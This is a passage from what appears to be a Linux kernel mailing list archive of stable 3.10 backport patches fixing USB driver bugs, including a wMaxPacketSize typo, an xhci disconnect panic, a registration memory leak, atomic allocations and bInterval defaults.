 	if (to_usb_device(ddev)->speed == USB_SPEED_HIGH
 			&& usb_endpoint_xfer_bulk(d)) {
-		unsigned maxp;
-
-		maxp = usb_endpoint_maxp(&endpoint->desc) & 0x07ff;
 		if (maxp != 512)
 			dev_warn(ddev, "config %d interface %d altsetting %d "
 				"bulk endpoint 0x%X has invalid maxpacket %d\n",
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 108/319] USB: fix typo in wMaxPacketSize validation
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (6 preceding siblings ...)
  2017-02-05 19:18 ` [PATCH 3.10 107/319] USB: validate wMaxPacketValue entries in endpoint descriptors Willy Tarreau
@ 2017-02-05 19:18 ` Willy Tarreau
  2017-02-05 19:18 ` [PATCH 3.10 109/319] usb: xhci: Fix panic if disconnect Willy Tarreau
                   ` (210 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:18 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Alan Stern, Greg Kroah-Hartman, Willy Tarreau

From: Alan Stern <stern@rowland.harvard.edu>

commit 6c73358c83ce870c0cf32413e5cadb3b9a39c606 upstream.

The maximum value allowed for wMaxPacketSize of a high-speed interrupt
endpoint is 1024 bytes, not 1023.

Signed-off-by: Alan Stern <stern@rowland.harvard.edu>
Fixes: aed9d65ac327 ("USB: validate wMaxPacketValue entries in endpoint descriptors")
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/usb/core/config.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/usb/core/config.c b/drivers/usb/core/config.c
index ecb2acb..b7ba1f9 100644
--- a/drivers/usb/core/config.c
+++ b/drivers/usb/core/config.c
@@ -160,7 +160,7 @@ static const unsigned short high_speed_maxpacket_maxes[4] = {
 	[USB_ENDPOINT_XFER_CONTROL] = 64,
 	[USB_ENDPOINT_XFER_ISOC] = 1024,
 	[USB_ENDPOINT_XFER_BULK] = 512,
-	[USB_ENDPOINT_XFER_INT] = 1023,
+	[USB_ENDPOINT_XFER_INT] = 1024,
 };
 static const unsigned short super_speed_maxpacket_maxes[4] = {
 	[USB_ENDPOINT_XFER_CONTROL] = 512,
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 109/319] usb: xhci: Fix panic if disconnect
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (7 preceding siblings ...)
  2017-02-05 19:18 ` [PATCH 3.10 108/319] USB: fix typo in wMaxPacketSize validation Willy Tarreau
@ 2017-02-05 19:18 ` Willy Tarreau
  2017-02-05 19:18 ` [PATCH 3.10 110/319] USB: serial: fix memleak in driver-registration error path Willy Tarreau
                   ` (209 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:18 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Jim Lin, Mathias Nyman, Willy Tarreau

From: Jim Lin <jilin@nvidia.com>

commit 88716a93766b8f095cdef37a8e8f2c93aa233b21 upstream.

After a device is disconnected, xhci_stop_device() is invoked from
xhci_bus_suspend().
The ISR for the "disconnect" IRQ also invokes xhci_free_virt_device(),
through this sequence:
xhci_irq -> xhci_handle_event -> handle_cmd_completion ->
xhci_handle_cmd_disable_slot -> xhci_free_virt_device

If xhci->devs[slot_id] has been set to NULL in
xhci_free_virt_device(), then virt_dev->eps[i].ring in
xhci_stop_device() may point to an invalid address and cause a kernel
panic.

virt_dev = xhci->devs[slot_id];
:
if (virt_dev->eps[i].ring && virt_dev->eps[i].ring->dequeue)

[] Unable to handle kernel paging request at virtual address 00001a68
[] pgd=ffffffc001430000
[] [00001a68] *pgd=000000013c807003, *pud=000000013c807003,
*pmd=000000013c808003, *pte=0000000000000000
[] Internal error: Oops: 96000006 [#1] PREEMPT SMP
[] CPU: 0 PID: 39 Comm: kworker/0:1 Tainted: G     U
[] Workqueue: pm pm_runtime_work
[] task: ffffffc0bc0e0bc0 ti: ffffffc0bc0ec000 task.ti:
ffffffc0bc0ec000
[] PC is at xhci_stop_device.constprop.11+0xb4/0x1a4

This issue was found when running with a Realtek ethernet device
(0bda:8153).

Signed-off-by: Jim Lin <jilin@nvidia.com>
Signed-off-by: Mathias Nyman <mathias.nyman@linux.intel.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/usb/host/xhci-hub.c | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/drivers/usb/host/xhci-hub.c b/drivers/usb/host/xhci-hub.c
index 0f71c3a..0f6edce 100644
--- a/drivers/usb/host/xhci-hub.c
+++ b/drivers/usb/host/xhci-hub.c
@@ -275,6 +275,9 @@ static int xhci_stop_device(struct xhci_hcd *xhci, int slot_id, int suspend)
 
 	ret = 0;
 	virt_dev = xhci->devs[slot_id];
+	if (!virt_dev)
+		return -ENODEV;
+
 	cmd = xhci_alloc_command(xhci, false, true, GFP_NOIO);
 	if (!cmd) {
 		xhci_dbg(xhci, "Couldn't allocate command structure.\n");
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 110/319] USB: serial: fix memleak in driver-registration error path
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (8 preceding siblings ...)
  2017-02-05 19:18 ` [PATCH 3.10 109/319] usb: xhci: Fix panic if disconnect Willy Tarreau
@ 2017-02-05 19:18 ` Willy Tarreau
  2017-02-05 19:18 ` [PATCH 3.10 111/319] USB: kobil_sct: fix non-atomic allocation in write path Willy Tarreau
                   ` (208 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:18 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Alexey Klimov, Johan Hovold, Willy Tarreau

From: Alexey Klimov <klimov.linux@gmail.com>

commit 647024a7df36014bbc4479d92d88e6b77c0afcf6 upstream.

The udriver struct allocated by kzalloc() is not freed if
usb_register() or one of the following calls fails. Fix this by
adding one more step, kfree(udriver), to the error path.
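
The unwind pattern can be sketched in userspace C.  Everything here is
a stand-in chosen for illustration: model_alloc()/model_free() replace
kzalloc()/kfree(), the fail_register flag replaces a failing
usb_register(), and live_allocs only exists to make the leak visible:

```c
#include <assert.h>
#include <stdlib.h>

static int live_allocs;		/* outstanding allocations in the model */

static void *model_alloc(void)
{
	void *p = malloc(16);

	if (p)
		live_allocs++;
	return p;
}

static void model_free(void *p)
{
	if (p)
		live_allocs--;
	free(p);
}

/* Returns 0 and hands the object to *out, or a negative error code. */
static int register_model(int fail_register, void **out)
{
	void *udriver = model_alloc();
	int rc;

	if (!udriver)
		return -1;

	rc = fail_register ? -2 : 0;	/* stands in for usb_register() */
	if (rc)
		goto failed_register;	/* a plain "return rc" would leak */

	*out = udriver;
	return 0;

failed_register:
	model_free(udriver);
	return rc;
}

static void register_demo(void)
{
	void *drv = NULL;

	/* Failure path: nothing is left allocated. */
	assert(register_model(1, &drv) == -2);
	assert(live_allocs == 0);

	/* Success path: the caller owns the object and frees it later. */
	assert(register_model(0, &drv) == 0);
	assert(live_allocs == 1);
	model_free(drv);
	assert(live_allocs == 0);
}
```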

Signed-off-by: Alexey Klimov <klimov.linux@gmail.com>
Acked-by: Alan Stern <stern@rowland.harvard.edu>
Signed-off-by: Johan Hovold <johan@kernel.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/usb/serial/usb-serial.c | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/drivers/usb/serial/usb-serial.c b/drivers/usb/serial/usb-serial.c
index 80d689f..faeb36d 100644
--- a/drivers/usb/serial/usb-serial.c
+++ b/drivers/usb/serial/usb-serial.c
@@ -1444,7 +1444,7 @@ int usb_serial_register_drivers(struct usb_serial_driver *const serial_drivers[]
 
 	rc = usb_register(udriver);
 	if (rc)
-		return rc;
+		goto failed_usb_register;
 
 	for (sd = serial_drivers; *sd; ++sd) {
 		(*sd)->usb_driver = udriver;
@@ -1462,6 +1462,8 @@ int usb_serial_register_drivers(struct usb_serial_driver *const serial_drivers[]
 	while (sd-- > serial_drivers)
 		usb_serial_deregister(*sd);
 	usb_deregister(udriver);
+failed_usb_register:
+	kfree(udriver);
 	return rc;
 }
 EXPORT_SYMBOL_GPL(usb_serial_register_drivers);
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 111/319] USB: kobil_sct: fix non-atomic allocation in write path
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (9 preceding siblings ...)
  2017-02-05 19:18 ` [PATCH 3.10 110/319] USB: serial: fix memleak in driver-registration error path Willy Tarreau
@ 2017-02-05 19:18 ` Willy Tarreau
  2017-02-05 19:18 ` [PATCH 3.10 112/319] USB: serial: mos7720: " Willy Tarreau
                   ` (207 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:18 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Johan Hovold, Willy Tarreau

From: Johan Hovold <johan@kernel.org>

commit 191252837626fca0de694c18bb2aa64c118eda89 upstream.

Write may be called from interrupt context so make sure to use
GFP_ATOMIC for all allocations in write.

Fixes: 1da177e4c3f4 ("Linux-2.6.12-rc2")
Cc: stable <stable@vger.kernel.org>
Signed-off-by: Johan Hovold <johan@kernel.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/usb/serial/kobil_sct.c | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/drivers/usb/serial/kobil_sct.c b/drivers/usb/serial/kobil_sct.c
index 78b48c3..efa75b4 100644
--- a/drivers/usb/serial/kobil_sct.c
+++ b/drivers/usb/serial/kobil_sct.c
@@ -336,7 +336,8 @@ static int kobil_write(struct tty_struct *tty, struct usb_serial_port *port,
 			port->interrupt_out_urb->transfer_buffer_length = length;
 
 			priv->cur_pos = priv->cur_pos + length;
-			result = usb_submit_urb(port->interrupt_out_urb, GFP_NOIO);
+			result = usb_submit_urb(port->interrupt_out_urb,
+					GFP_ATOMIC);
 			dev_dbg(&port->dev, "%s - Send write URB returns: %i\n", __func__, result);
 			todo = priv->filled - priv->cur_pos;
 
@@ -351,7 +352,7 @@ static int kobil_write(struct tty_struct *tty, struct usb_serial_port *port,
 		if (priv->device_type == KOBIL_ADAPTER_B_PRODUCT_ID ||
 			priv->device_type == KOBIL_ADAPTER_K_PRODUCT_ID) {
 			result = usb_submit_urb(port->interrupt_in_urb,
-								GFP_NOIO);
+					GFP_ATOMIC);
 			dev_dbg(&port->dev, "%s - Send read URB returns: %i\n", __func__, result);
 		}
 	}
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 112/319] USB: serial: mos7720: fix non-atomic allocation in write path
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (10 preceding siblings ...)
  2017-02-05 19:18 ` [PATCH 3.10 111/319] USB: kobil_sct: fix non-atomic allocation in write path Willy Tarreau
@ 2017-02-05 19:18 ` Willy Tarreau
  2017-02-05 19:18 ` [PATCH 3.10 113/319] USB: serial: mos7840: " Willy Tarreau
                   ` (206 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:18 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Alexey Khoroshilov, Johan Hovold, Willy Tarreau

From: Alexey Khoroshilov <khoroshilov@ispras.ru>

commit 5a5a1d614287a647b36dff3f40c2b0ceabbc83ec upstream.

There is an allocation with GFP_KERNEL flag in mos7720_write(),
while it may be called from interrupt context.

Follow-up for commit 191252837626 ("USB: kobil_sct: fix non-atomic
allocation in write path")

Found by Linux Driver Verification project (linuxtesting.org).

Signed-off-by: Alexey Khoroshilov <khoroshilov@ispras.ru>
Signed-off-by: Johan Hovold <johan@kernel.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/usb/serial/mos7720.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/usb/serial/mos7720.c b/drivers/usb/serial/mos7720.c
index 0f16bf6e..ddc71d7 100644
--- a/drivers/usb/serial/mos7720.c
+++ b/drivers/usb/serial/mos7720.c
@@ -1250,7 +1250,7 @@ static int mos7720_write(struct tty_struct *tty, struct usb_serial_port *port,
 
 	if (urb->transfer_buffer == NULL) {
 		urb->transfer_buffer = kmalloc(URB_TRANSFER_BUFFER_SIZE,
-					       GFP_KERNEL);
+					       GFP_ATOMIC);
 		if (urb->transfer_buffer == NULL) {
 			dev_err_console(port, "%s no more kernel memory...\n",
 				__func__);
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 113/319] USB: serial: mos7840: fix non-atomic allocation in write path
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (11 preceding siblings ...)
  2017-02-05 19:18 ` [PATCH 3.10 112/319] USB: serial: mos7720: " Willy Tarreau
@ 2017-02-05 19:18 ` Willy Tarreau
  2017-02-05 19:18 ` [PATCH 3.10 114/319] usb: renesas_usbhs: fix clearing the {BRDY,BEMP}STS condition Willy Tarreau
                   ` (205 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:18 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Alexey Khoroshilov, Johan Hovold, Willy Tarreau

From: Alexey Khoroshilov <khoroshilov@ispras.ru>

commit 3b7c7e52efda0d4640060de747768360ba70a7c0 upstream.

There is an allocation with GFP_KERNEL flag in mos7840_write(),
while it may be called from interrupt context.

Follow-up for commit 191252837626 ("USB: kobil_sct: fix non-atomic
allocation in write path")

Found by Linux Driver Verification project (linuxtesting.org).

Signed-off-by: Alexey Khoroshilov <khoroshilov@ispras.ru>
Signed-off-by: Johan Hovold <johan@kernel.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/usb/serial/mos7840.c | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/drivers/usb/serial/mos7840.c b/drivers/usb/serial/mos7840.c
index d060130..7df7df6 100644
--- a/drivers/usb/serial/mos7840.c
+++ b/drivers/usb/serial/mos7840.c
@@ -1438,8 +1438,8 @@ static int mos7840_write(struct tty_struct *tty, struct usb_serial_port *port,
 	}
 
 	if (urb->transfer_buffer == NULL) {
-		urb->transfer_buffer =
-		    kmalloc(URB_TRANSFER_BUFFER_SIZE, GFP_KERNEL);
+		urb->transfer_buffer = kmalloc(URB_TRANSFER_BUFFER_SIZE,
+					       GFP_ATOMIC);
 
 		if (urb->transfer_buffer == NULL) {
 			dev_err_console(port, "%s no more kernel memory...\n",
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 114/319] usb: renesas_usbhs: fix clearing the {BRDY,BEMP}STS condition
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (12 preceding siblings ...)
  2017-02-05 19:18 ` [PATCH 3.10 113/319] USB: serial: mos7840: " Willy Tarreau
@ 2017-02-05 19:18 ` Willy Tarreau
  2017-02-05 19:18 ` [PATCH 3.10 115/319] USB: change bInterval default to 10 ms Willy Tarreau
                   ` (204 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:18 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Yoshihiro Shimoda, Felipe Balbi, Willy Tarreau

From: Yoshihiro Shimoda <yoshihiro.shimoda.uh@renesas.com>

commit 519d8bd4b5d3d82c413eac5bb42b106bb4b9ec15 upstream.

The previous driver could wrongly stop the transfer.
For example:
 1) An interrupt happens, but it is not a BRDY interrupt.
 2) INTSTS0 is read, so state->intsts0 does not have BRDY set.
 3) BRDY is set to 1 here.
 4) BRDYSTS is read.
 5) BRDYSTS is cleared, so BRDY is wrongly cleared as well.

Remarks:
 - The INTSTS0.BRDY is read only.
  - If any bits of BRDYSTS are set to 1, the BRDY is set to 1.
  - If BRDYSTS is 0, the BRDY is set to 0.

So, this patch adds a condition to avoid this situation. (NRDYSTS is
not used for now, but to avoid any side effects this patch doesn't
touch it.)
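
The sequence above can be replayed in a small userspace model. This is
only a sketch under stated assumptions: the register struct, the BRDY
bit position and the helper names are hypothetical, and the model
assumes the callbacks run only when the INTSTS0 snapshot had BRDY set.

```c
#include <stdint.h>

#define FAKE_BRDY 0x0100	/* hypothetical bit position in INTSTS0 */

struct fake_regs {
	uint16_t brdysts;
};

/* INTSTS0.BRDY is read only: it is 1 iff any BRDYSTS bit is 1. */
uint16_t fake_read_intsts0(const struct fake_regs *r)
{
	return r->brdysts ? FAKE_BRDY : 0;
}

/* Writing 0 to a status bit clears it, writing 1 leaves it alone. */
void fake_write_brdysts(struct fake_regs *r, uint16_t val)
{
	r->brdysts &= val;
}

/*
 * One pass of the handler. 'late_event' is a BRDYSTS bit that the
 * hardware sets between the two register reads. Returns the pipes
 * that were actually serviced.
 */
uint16_t fake_handle_irq(struct fake_regs *r, uint16_t late_event, int fixed)
{
	uint16_t intsts0 = fake_read_intsts0(r);	/* step 2 */
	uint16_t brdysts;

	r->brdysts |= late_event;			/* step 3 */
	brdysts = r->brdysts;				/* step 4 */

	/* step 5: the fix clears BRDYSTS only if the snapshot saw BRDY */
	if (!fixed || (intsts0 & FAKE_BRDY))
		fake_write_brdysts(r, (uint16_t)~brdysts);

	return (intsts0 & FAKE_BRDY) ? brdysts : 0;
}
```

In this model the unfixed handler clears the late bit without servicing
it, while the fixed handler leaves it pending for the next interrupt.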

Fixes: d5c6a1e024dd ("usb: renesas_usbhs: fixup interrupt status clear method")
Signed-off-by: Yoshihiro Shimoda <yoshihiro.shimoda.uh@renesas.com>
Signed-off-by: Felipe Balbi <felipe.balbi@linux.intel.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/usb/renesas_usbhs/mod.c | 11 +++++++++--
 1 file changed, 9 insertions(+), 2 deletions(-)

diff --git a/drivers/usb/renesas_usbhs/mod.c b/drivers/usb/renesas_usbhs/mod.c
index 6a030b9..254194d 100644
--- a/drivers/usb/renesas_usbhs/mod.c
+++ b/drivers/usb/renesas_usbhs/mod.c
@@ -272,9 +272,16 @@ static irqreturn_t usbhs_interrupt(int irq, void *data)
 	usbhs_write(priv, INTSTS0, ~irq_state.intsts0 & INTSTS0_MAGIC);
 	usbhs_write(priv, INTSTS1, ~irq_state.intsts1 & INTSTS1_MAGIC);
 
-	usbhs_write(priv, BRDYSTS, ~irq_state.brdysts);
+	/*
+	 * The driver should not clear the xxxSTS after the line of
+	 * "call irq callback functions" because each "if" statement is
+	 * possible to call the callback function for avoiding any side effects.
+	 */
+	if (irq_state.intsts0 & BRDY)
+		usbhs_write(priv, BRDYSTS, ~irq_state.brdysts);
 	usbhs_write(priv, NRDYSTS, ~irq_state.nrdysts);
-	usbhs_write(priv, BEMPSTS, ~irq_state.bempsts);
+	if (irq_state.intsts0 & BEMP)
+		usbhs_write(priv, BEMPSTS, ~irq_state.bempsts);
 
 	/*
 	 * call irq callback functions
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 115/319] USB: change bInterval default to 10 ms
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (13 preceding siblings ...)
  2017-02-05 19:18 ` [PATCH 3.10 114/319] usb: renesas_usbhs: fix clearing the {BRDY,BEMP}STS condition Willy Tarreau
@ 2017-02-05 19:18 ` Willy Tarreau
  2017-02-05 19:18 ` [PATCH 3.10 116/319] usb: gadget: fsl_qe_udc: signedness bug in qe_get_frame() Willy Tarreau
                   ` (203 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:18 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Alan Stern, Greg Kroah-Hartman, Willy Tarreau

From: Alan Stern <stern@rowland.harvard.edu>

commit 08c5cd37480f59ea39682f4585d92269be6b1424 upstream.

Some full-speed mceusb infrared transceivers contain invalid endpoint
descriptors for their interrupt endpoints, with bInterval set to 0.
In the past they have worked out okay with the mceusb driver, because
the driver sets the bInterval field in the descriptor to 1,
overwriting whatever value may have been there before.  However, this
approach was never sanctioned by the USB core, and in fact it does not
work with xHCI controllers, because they use the bInterval value that
was present when the configuration was installed.

Currently usbcore uses 32 ms as the default interval if the value in
the endpoint descriptor is invalid.  It turns out that these IR
transceivers don't work properly unless the interval is set to 10 ms
or below.  To work around this mceusb problem, this patch changes the
endpoint-descriptor parsing routine, making the default interval value
be 10 ms rather than 32 ms.
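
The defaults in the diff are expressed in different units depending on
speed and endpoint type, which is easy to misread. A minimal sketch of
the arithmetic, assuming the usual USB 2.0 encoding (125 us microframes
at high speed, 1 ms frames at full speed, exponent form 2^(n-1)); the
helper names are hypothetical and not part of usbcore:

```c
#include <assert.h>

/* Exponent-encoded bInterval: period = 2^(n-1) units, n in 1..16. */
unsigned long binterval_exp_units(unsigned int n)
{
	assert(n >= 1 && n <= 16);
	return 1UL << (n - 1);
}

/* High speed: the unit is one 125 us microframe. */
unsigned long hs_interval_us(unsigned int n)
{
	return binterval_exp_units(n) * 125;
}

/* Full-speed isochronous: the unit is one 1 ms frame. */
unsigned long fs_isoc_interval_us(unsigned int n)
{
	return binterval_exp_units(n) * 1000;
}

/* Full/low-speed interrupt: bInterval is a plain count of 1 ms frames. */
unsigned long fs_int_interval_us(unsigned int n)
{
	return (unsigned long)n * 1000;
}
```

Under these assumptions n = 7 at high speed is 64 microframes, i.e.
8 ms, and n = 10 for a full-speed interrupt endpoint is 10 ms, which is
why the new comment in the patch says "10 or 8 ms".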

Signed-off-by: Alan Stern <stern@rowland.harvard.edu>
Tested-by: Wade Berrier <wberrier@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/usb/core/config.c | 28 +++++++++++++++++-----------
 1 file changed, 17 insertions(+), 11 deletions(-)

diff --git a/drivers/usb/core/config.c b/drivers/usb/core/config.c
index b7ba1f9..3252bb2 100644
--- a/drivers/usb/core/config.c
+++ b/drivers/usb/core/config.c
@@ -213,8 +213,10 @@ static int usb_parse_endpoint(struct device *ddev, int cfgno, int inum,
 	memcpy(&endpoint->desc, d, n);
 	INIT_LIST_HEAD(&endpoint->urb_list);
 
-	/* Fix up bInterval values outside the legal range. Use 32 ms if no
-	 * proper value can be guessed. */
+	/*
+	 * Fix up bInterval values outside the legal range.
+	 * Use 10 or 8 ms if no proper value can be guessed.
+	 */
 	i = 0;		/* i = min, j = max, n = default */
 	j = 255;
 	if (usb_endpoint_xfer_int(d)) {
@@ -222,20 +224,24 @@ static int usb_parse_endpoint(struct device *ddev, int cfgno, int inum,
 		switch (to_usb_device(ddev)->speed) {
 		case USB_SPEED_SUPER:
 		case USB_SPEED_HIGH:
-			/* Many device manufacturers are using full-speed
+			/*
+			 * Many device manufacturers are using full-speed
 			 * bInterval values in high-speed interrupt endpoint
-			 * descriptors. Try to fix those and fall back to a
-			 * 32 ms default value otherwise. */
+			 * descriptors. Try to fix those and fall back to an
+			 * 8-ms default value otherwise.
+			 */
 			n = fls(d->bInterval*8);
 			if (n == 0)
-				n = 9;	/* 32 ms = 2^(9-1) uframes */
+				n = 7;	/* 8 ms = 2^(7-1) uframes */
 			j = 16;
 			break;
 		default:		/* USB_SPEED_FULL or _LOW */
-			/* For low-speed, 10 ms is the official minimum.
+			/*
+			 * For low-speed, 10 ms is the official minimum.
 			 * But some "overclocked" devices might want faster
-			 * polling so we'll allow it. */
-			n = 32;
+			 * polling so we'll allow it.
+			 */
+			n = 10;
 			break;
 		}
 	} else if (usb_endpoint_xfer_isoc(d)) {
@@ -243,10 +249,10 @@ static int usb_parse_endpoint(struct device *ddev, int cfgno, int inum,
 		j = 16;
 		switch (to_usb_device(ddev)->speed) {
 		case USB_SPEED_HIGH:
-			n = 9;		/* 32 ms = 2^(9-1) uframes */
+			n = 7;		/* 8 ms = 2^(7-1) uframes */
 			break;
 		default:		/* USB_SPEED_FULL */
-			n = 6;		/* 32 ms = 2^(6-1) frames */
+			n = 4;		/* 8 ms = 2^(4-1) frames */
 			break;
 		}
 	}
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 116/319] usb: gadget: fsl_qe_udc: signedness bug in qe_get_frame()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (14 preceding siblings ...)
  2017-02-05 19:18 ` [PATCH 3.10 115/319] USB: change bInterval default to 10 ms Willy Tarreau
@ 2017-02-05 19:18 ` Willy Tarreau
  2017-02-05 19:18 ` [PATCH 3.10 117/319] USB: serial: cp210x: fix hardware flow-control disable Willy Tarreau
                   ` (202 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:18 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Dan Carpenter, Felipe Balbi, Willy Tarreau

From: Dan Carpenter <dan.carpenter@oracle.com>

commit f4693b08cc901912a87369c46537b94ed4084ea0 upstream.

We can't assign -EINVAL to a u16.
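
A userspace sketch of the problem, assuming u16 behaves like uint16_t
and int is wider than 16 bits. The two functions are hypothetical
stand-ins for the old and new shape of qe_get_frame(), with the
register value passed in as a parameter:

```c
#include <errno.h>
#include <stdint.h>

/* Old shape: the error code goes through a 16-bit unsigned temporary. */
int get_frame_old(uint16_t frame_n)
{
	uint16_t tmp = frame_n;

	if (tmp & 0x8000)
		tmp = tmp & 0x07ff;
	else
		tmp = -EINVAL;	/* wraps modulo 65536 to a large positive value */

	return (int)tmp;	/* zero-extended, so never negative */
}

/* New shape: return directly, so -EINVAL stays an int. */
int get_frame_new(uint16_t frame_n)
{
	if (frame_n & 0x8000)
		return frame_n & 0x07ff;
	return -EINVAL;
}
```

A caller testing for a negative return value would never see the error
from the old version, because it comes back as 65536 - EINVAL.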

Fixes: 3948f0e0c999 ('usb: add Freescale QE/CPM USB peripheral controller driver')
Acked-by: Peter Chen <peter.chen@nxp.com>
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Signed-off-by: Felipe Balbi <felipe.balbi@linux.intel.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/usb/gadget/fsl_qe_udc.c | 7 ++-----
 1 file changed, 2 insertions(+), 5 deletions(-)

diff --git a/drivers/usb/gadget/fsl_qe_udc.c b/drivers/usb/gadget/fsl_qe_udc.c
index 9a7ee33..9fd2330 100644
--- a/drivers/usb/gadget/fsl_qe_udc.c
+++ b/drivers/usb/gadget/fsl_qe_udc.c
@@ -1881,11 +1881,8 @@ static int qe_get_frame(struct usb_gadget *gadget)
 
 	tmp = in_be16(&udc->usb_param->frame_n);
 	if (tmp & 0x8000)
-		tmp = tmp & 0x07ff;
-	else
-		tmp = -EINVAL;
-
-	return (int)tmp;
+		return tmp & 0x07ff;
+	return -EINVAL;
 }
 
 static int fsl_qe_start(struct usb_gadget *gadget,
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 117/319] USB: serial: cp210x: fix hardware flow-control disable
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (15 preceding siblings ...)
  2017-02-05 19:18 ` [PATCH 3.10 116/319] usb: gadget: fsl_qe_udc: signedness bug in qe_get_frame() Willy Tarreau
@ 2017-02-05 19:18 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 118/319] usb: misc: legousbtower: Fix NULL pointer deference Willy Tarreau
                   ` (201 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:18 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Konstantin Shkolnyy, Johan Hovold, Willy Tarreau

From: Konstantin Shkolnyy <konstantin.shkolnyy@gmail.com>

commit a377f9e906af4df9071ba8ddba60188cb4013d93 upstream.

A bug in the CRTSCTS handling caused RTS to alternate between

CRTSCTS=0 => "RTS is transmit active signal" and
CRTSCTS=1 => "RTS is used for receive flow control"

instead of

CRTSCTS=0 => "RTS is statically active" and
CRTSCTS=1 => "RTS is used for receive flow control"

This only happened after first having enabled CRTSCTS.
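
The effect of "|=" versus "=" on the RTS mode byte can be sketched as
follows. The bit values are assumptions that are consistent with the
description above but not shown in this diff: 0x40 for "statically
active", 0x80 for "receive flow control" (the value the CRTSCTS branch
is assumed to store), and both bits together for "transmit active
signal". The function names are hypothetical.

```c
#include <stdint.h>

/* Assumed encodings of the RTS mode byte (modem_ctl[1]). */
enum {
	RTS_STATIC_ACTIVE = 0x40,
	RTS_RX_FLOW_CTL   = 0x80,
	RTS_TX_ACTIVE     = 0xC0,
};

/* CRTSCTS=1: the byte is overwritten with the flow-control mode. */
uint8_t enable_crtscts(uint8_t ctl1)
{
	(void)ctl1;
	return RTS_RX_FLOW_CTL;
}

/* Old CRTSCTS=0 path: ORs the new mode into whatever was there. */
uint8_t disable_crtscts_old(uint8_t ctl1)
{
	return ctl1 | RTS_STATIC_ACTIVE;
}

/* Fixed CRTSCTS=0 path: overwrites the byte. */
uint8_t disable_crtscts_new(uint8_t ctl1)
{
	(void)ctl1;
	return RTS_STATIC_ACTIVE;
}
```

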